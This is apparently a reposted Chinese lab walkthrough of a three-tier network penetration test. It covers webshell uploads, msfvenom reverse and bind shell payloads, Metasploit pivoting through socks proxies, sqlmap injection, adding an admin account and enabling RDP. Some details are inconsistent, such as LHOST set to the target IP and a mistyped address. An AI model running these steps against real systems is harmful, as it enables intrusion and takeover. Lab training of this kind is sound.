三層網絡滲透測試實驗
聲明:此次滲透環境為實驗環境,僅供滲透實驗學校參考
前言
在滲透測試過程中我們會遇到很多不同的網絡情況,或許普通的內網滲透我們已經很熟練了,但在現實環境中或許會有多層網絡結構,如果遇到多層網絡結構我們應該如何進行滲透呢?
利用這個實驗我們就可以更清晰的了解多層網絡滲透測試的過程。并了解通過msf進行內網滲透,由一級代理到二級代理的搭建來進行對三層網絡的滲透的過程。
【三層網絡拓撲圖】

【第一層主機】
目標ip:192.168.31.207
訪問目標ip發現是一個文件上傳頁面

經測試可通過文件類型MIME繞過進行上傳php腳本,上傳成功后返回路徑

訪問返回的文件路徑,成功連接到php大馬

查看ip發現該主機是雙網卡,第二層網絡段為192.168.1.0/24

為進一步進行內網滲透,我們上傳msf后門
后門制作:
1.msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.207 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >shell.elf
將后門上傳到第一層主機192.168.31.207
設置msf監聽

在第一層主機上運行shell.elf
Chmod 777 shell.elf ./shell.elf
msf獲得meterpreter

將第一層的meterpreter切換到后臺運行
1.background

【第二層主機】
利用第一層的meterpreter添加第二層的路由
1.run autoroute -s 192.168.1.0/24

掃描發現第二層主機ip為192.168.1.100
接著利用msf搭建socks代理,好讓攻擊機直接打第二層網絡:
1.use auxiliary/server/socks4a

設置好代理后訪問192.168.1.100成功訪問到網站

利用弱口令admin/admin登錄到后臺
在設置處發現可修改允許上傳文件的類型,修改后保存設置

在撰寫新文章處添加附件可直接上傳php腳本

成功連接到php大馬

為了打開第三層,我們需要在第二層主機上傳msf后門
制作后門:
msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=1234 -f elf > ding.elf
利用大馬上傳,并在第二層主機上運行
chmod 777 ding.elf ./ding.elf
設置msf相關配置

成功獲取到第二層主機meterpreter

查看ip發現第三層網段為192.168.2.0/24

利用第二層主機的meterpreter添加第三層的網絡路由

啟用一個socks4a代理給第三層網絡,端口設置為2334

然后在配置文件中加上
1.socks4 192.168.31.119 2334

利用獲得的meterpreter發現第三層目標主機為192.16.2.100

【第三層主機】
使用代理打開Firefox訪問第三層主機ip192.168.2.100

通過測試發現http://192.168.2.100/category.php?cat_id=1處存在sql注入

利用proxychains跑一下sqlmap
1.proxychains sqlmap -u"http://192.168.2.100/category.php?cat_id=1"

成功注出后臺賬號和加密的密碼

發現管理員密碼解不開,
利用nmap掃描網站后臺路徑。
1.proxychains nmap --script http-enum -p80 192.168.2.100

發現有個上傳點

測試發現該上傳點是前端檢測,利用JavaScript繞過即可上傳成功

訪問/upload/uploads/webshelldama.php成功連接到php大馬

利用大馬查看發現是windows2003系統

添加用戶賬號密碼

將添加的用戶賬號密碼添加到管理組

利用大馬開啟3389端口
1.wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

成功開啟3389端口

利用添加的管理員賬號密碼成功登錄到遠程桌面

版權申明:內容來源網絡,版權歸原創者所有。除非無法確認,都會標明作者及出處,如有侵權,煩請告知,我們會立即刪除并致歉!